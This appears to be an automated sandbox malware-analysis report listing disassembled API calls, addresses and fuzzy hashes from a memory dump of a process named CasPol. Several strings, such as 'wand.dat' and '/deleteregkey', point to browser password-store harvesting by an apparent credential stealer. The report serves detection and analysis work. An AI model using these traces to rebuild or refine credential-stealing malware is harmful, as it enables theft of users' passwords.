                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                          • String ID: caption
                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$free
                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                                                                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: F^@
• API String ID: 568519121-3652327722
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3669619086-0
                                                                                                                                                                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
